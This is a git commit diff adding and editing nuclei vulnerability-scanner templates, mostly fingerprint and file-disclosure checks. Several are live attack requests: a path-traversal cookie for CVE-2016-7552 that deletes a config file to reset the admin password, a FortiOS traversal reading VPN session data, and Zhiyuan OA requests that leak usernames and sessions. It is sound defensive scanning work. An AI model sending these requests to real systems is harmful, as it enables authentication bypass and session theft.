commit
4f4e83b173
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||
| cves | 200 | vulnerabilities | 94 | exposed-panels | 74 |
|
||||
| exposures | 52 | technologies | 46 | misconfiguration | 44 |
|
||||
| cves | 204 | vulnerabilities | 96 | exposed-panels | 74 |
|
||||
| exposures | 55 | technologies | 46 | misconfiguration | 48 |
|
||||
| workflows | 21 | miscellaneous | 12 | default-logins | 10 |
|
||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||
| helpers | 2 | takeovers | 1 | - | - |
|
||||
|
||||
**61 directories, 584 files**.
|
||||
**61 directories, 597 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2016-7552
|
||||
|
||||
info:
|
||||
name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
|
||||
tags: cve,cve2016
|
||||
|
||||
# This template exploits an authentication bypass vulnerability via a file delete in logoff.cgi
|
||||
# which resets the admin password back to 'admin' upon a reboot.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/logoff.cgi"
|
||||
headers:
|
||||
Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "Backtrace"
|
||||
part: header
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2017-7269
|
||||
|
||||
info:
|
||||
name: CVE-2017-7269
|
||||
author: thomas_from_offensity
|
||||
severity: critical
|
||||
description: RCE - Buffer overflow in ScStoragePathFromUrl function (WebDAV service - IIS 6.0) - Windows Server 2003 R2
|
||||
|
||||
# this was implemented based on the "check"-method in:
|
||||
# https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
|
||||
|
||||
requests:
|
||||
- method: OPTIONS
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "IIS/6.0"
|
||||
part: header
|
||||
- type: dsl
|
||||
dsl:
|
||||
- regex("<DAV:sql>", dasl) # lowercase header name: DASL
|
||||
- regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV
|
||||
- regex(".*?PROPFIND", public) # lowercase header name: Public
|
||||
- regex(".*?PROPFIND", allow) # lowercase header name: Allow
|
||||
condition: or
|
||||
part: header
|
|
@ -9,8 +9,8 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
||||
- "{{BaseURL}}/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "var fgt_lang ="
|
||||
- "var fgt_lang"
|
||||
|
|
|
@ -34,3 +34,9 @@ requests:
|
|||
words:
|
||||
- "Contact Site Administrators"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "has not yet configured this contact form"
|
||||
part: body
|
||||
negative: true
|
|
@ -6,8 +6,7 @@ info:
|
|||
severity: medium
|
||||
reference: https://www.oracle.com/security-alerts/cpuoct2020.html
|
||||
tags: cve,cve2020,oracle,xss
|
||||
|
||||
# https://twitter.com/HackerOn2Wheels/status/1326927875279380480
|
||||
source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -23,4 +22,6 @@ requests:
|
|||
words:
|
||||
- "X-Oracle-Dms-Ecid:"
|
||||
- "X-Oracle-Dms-Rid:"
|
||||
- "Set-Cookie:"
|
||||
part: header
|
||||
condition: and
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2020-22840
|
||||
|
||||
info:
|
||||
name: CVE-2020-22840
|
||||
author: geeknik
|
||||
severity: low
|
||||
description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
|
||||
tags: cve,cve2020,redirect,b2evolution
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
|
||||
part: header
|
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2021-21972
|
||||
|
||||
info:
|
||||
name: VMware vCenter Unauthorized RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
reference: https://swarm.ptsecurity.com/unauth-rce-vmware/
|
||||
description: The vulnerability allows unauthenticated remote attackers to upload file leading to remote code execution (RCE). This templates only detects the plugin.
|
||||
tags: cve,cve2021,vmware,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "VSPHERE-UI-JSESSIONID"
|
||||
part: header
|
||||
condtion: and
|
||||
- type: regex
|
||||
regex:
|
||||
- "(Install|Config) Final Progress"
|
||||
part: body
|
|
@ -0,0 +1,28 @@
|
|||
id: openapi
|
||||
|
||||
info:
|
||||
name: OpenAPI
|
||||
author: pdteam
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/openapi.json"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- application/openapi+json
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- openapi
|
||||
- paths
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -56,6 +56,7 @@ requests:
|
|||
- "swagger:"
|
||||
- "\"swagger\":"
|
||||
- "Swagger UI"
|
||||
- "**token**:"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: bower-json
|
||||
|
||||
info:
|
||||
name: bower.json file disclosure
|
||||
author: oppsec
|
||||
severity: info
|
||||
description: Bower is a package manager which stores packages informations in bower.json file
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/bower.json"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "name"
|
||||
- "description"
|
||||
- "main"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: yarn-lock
|
||||
|
||||
info:
|
||||
name: yarn lock file disclosure
|
||||
author: oppsec
|
||||
severity: info
|
||||
description: yarn.lock is a file which store all exactly versions of each dependency were installed.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/yarn.lock"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY."
|
||||
- "# yarn lockfile v1"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -5,16 +5,20 @@ info:
|
|||
author: pd-team
|
||||
severity: low
|
||||
tags: apache,rce
|
||||
reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/ws/v1/cluster/apps/new-application'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'application-id'
|
||||
- application-id
|
||||
- maximum-resource-capability
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
matchers-condition: and
|
|
@ -0,0 +1,26 @@
|
|||
id: zhiyuan-oa-info-leak
|
||||
|
||||
info:
|
||||
name: Zhiyuan Oa A6-s info Leak
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
reference: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
|
||||
tags: zhiyuan,leak,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "attachment"
|
||||
- "application/x-msdownload"
|
||||
part: header
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: zhiyuan-oa-session-leak
|
||||
|
||||
info:
|
||||
name: Zhiyuan Oa Session Leak
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://www.zhihuifly.com/t/topic/3345
|
||||
tags: zhiyuan,leak,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<usrID>"
|
||||
- "<sessionID>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue